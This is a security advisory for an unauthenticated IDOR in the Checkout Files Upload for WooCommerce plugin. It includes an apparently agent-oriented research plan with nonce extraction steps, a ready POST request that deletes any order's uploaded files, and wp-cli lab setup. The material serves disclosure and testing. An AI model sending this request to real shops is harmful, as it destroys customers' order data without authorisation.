Checkout Files Upload for WooCommerce <= 2.2.5 - Unauthenticated Insecure Direct Object Reference
Description
The Checkout Files Upload for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.2.5 due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to perform an unauthorized action.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:NTechnical Details
<=2.2.5What Changed in the Fix
Changes introduced in v2.2.6
Source Code
WordPress.org SVN# Research Plan: CVE-2026-42725 - Checkout Files Upload for WooCommerce IDOR ## 1. Vulnerability Summary The **Checkout Files Upload for WooCommerce** plugin (up to 2.2.5) is vulnerable to an **Unauthenticated Insecure Direct Object Reference (IDOR)**. The vulnerability exists because the AJAX hand…
Show full research plan
Research Plan: CVE-2026-42725 - Checkout Files Upload for WooCommerce IDOR
1. Vulnerability Summary
The Checkout Files Upload for WooCommerce plugin (up to 2.2.5) is vulnerable to an Unauthenticated Insecure Direct Object Reference (IDOR). The vulnerability exists because the AJAX handler responsible for deleting uploaded files (alg_ajax_file_delete) fails to verify if the requester has permission to modify the specified order or if the order belongs to their session. While a nonce check was added in version 2.1.4, it only ensures the request is "valid" in a generic sense; it does not perform a capability check or ownership validation. This allows an unauthenticated attacker to delete files attached to any WooCommerce order by simply providing the target order_id.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - Action:
alg_ajax_file_delete(registered viawp_ajax_nopriv_alg_ajax_file_delete) - Vulnerable Parameter:
order_id - Authentication: Unauthenticated (leveraging the
noprivhook) - Preconditions:
- The plugin must be enabled (
alg_wc_checkout_files_upload_enabledoption). - An order exists with an attached file uploaded via the plugin.
- The attacker must obtain a valid AJAX nonce (available on any page where the uploader is rendered).
- The plugin must be enabled (
3. Code Flow
- Entry Point: The plugin registers AJAX handlers in
includes/class-alg-wc-checkout-files-upload.php:add_action( 'wp_ajax_' . 'alg_ajax_file_delete', array( $this, 'alg_ajax_file_delete' ) ); add_action( 'wp_ajax_nopriv_' . 'alg_ajax_file_delete', array( $this, 'alg_ajax_file_delete' ) ); - Execution: When
admin-ajax.phpis called withaction=alg_ajax_file_delete, the methodAlg_WC_Checkout_Files_Upload_Main::alg_ajax_file_delete()is executed. - Missing Validation: In versions <= 2.2.5, the function typically:
- Retrieves
order_idandfile_numfrom$_POST. - Verifies a nonce using
check_ajax_referer. - Sink: It proceeds to delete the file or the metadata associated with the file for the given
order_idwithout checking if the current user is the owner of the order or hasmanage_woocommercecapabilities.
- Retrieves
- Patch Difference: The version 2.2.6 patch introduces a capability check (e.g.,
current_user_can) or a session-based validation before processing the deletion.
4. Nonce Acquisition Strategy
The AJAX nonce is required for the request to pass check_ajax_referer. This nonce is localized for the frontend scripts.
- Identify the Script: The plugin enqueues frontend scripts in
Alg_WC_Checkout_Files_Upload_Main::enqueue_scripts. - Create a Trigger Page: The uploader must be visible to trigger the script localization. Use a shortcode on a public page:
wp post create --post_type=page --post_title="Upload" --post_status=publish --post_content='[wpwham_checkout_files_uploader]'
- Extract Nonce:
- Navigate to the newly created page.
- Use
browser_evalto extract the nonce from the localized JS object. - Localization Key (inferred):
alg_wc_checkout_files_uploadorwpwham_checkout_files_upload. - Nonce Key (inferred):
ajax_nonceornonce. - Command:
browser_eval("window.alg_wc_checkout_files_upload?.ajax_nonce")
5. Exploitation Strategy
Step 1: Target Identification
Determine the order_id of the victim order and the file_num (usually starting at 1) of the attachment to be deleted.
Step 2: Request Construction
Perform an unauthenticated POST request to the AJAX endpoint.
HTTP Request:
- URL:
http://<target>/wp-admin/admin-ajax.php - Method:
POST - Headers:
Content-Type: application/x-www-form-urlencoded - Body:
action=alg_ajax_file_delete&order_id=[VICTIM_ORDER_ID]&file_num=1&nonce=[EXTRACTED_NONCE]
Step 3: Execution
Use the http_request tool to send the payload.
6. Test Data Setup
- Enable Plugin:
wp option update alg_wc_checkout_files_upload_enabled yes
- Create Victim Order:
- Create a WooCommerce order:
wp wc shop_order create --customer_id=0 --status=processing --user=admin(Note the returned ID).
- Create a WooCommerce order:
- Simulate File Upload:
- The plugin stores file info in post meta. Simulate an upload for the victim order:
wp post meta update [ORDER_ID] _alg_checkout_files_upload_1 '{"file_name":"secret_blueprint.pdf","file_path":"/path/to/upload"}'
- Setup Nonce Page:
wp post create --post_type=page --post_status=publish --post_content='[wpwham_checkout_files_uploader]'
7. Expected Results
- Success: The server returns a success response (likely JSON
{"success": true}or a specific success string). - Impact: The metadata
_alg_checkout_files_upload_1is removed from the victim order, or the associated file is deleted from the server, effectively removing the customer's uploaded content from the order.
8. Verification Steps
- Database Check: Verify the post meta no longer exists for the victim order:
wp post meta get [ORDER_ID] _alg_checkout_files_upload_1- Expected output: Error/Empty (meta does not exist).
- UI Check: Navigate to the WooCommerce Order Edit page in the admin dashboard and confirm the "Checkout Files Upload" metabox no longer lists the file.
9. Alternative Approaches
If the order_id is protected by an order_key (WooCommerce's guest access mechanism), attempt to find endpoints where the order_key is not checked. If alg_ajax_file_delete requires an order_key, the vulnerability may shift to a lack of order_key validation, allowing the same IDOR if the key can be omitted or bypassed. However, the CVSS and description suggest a direct missing authorization check on the ID.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.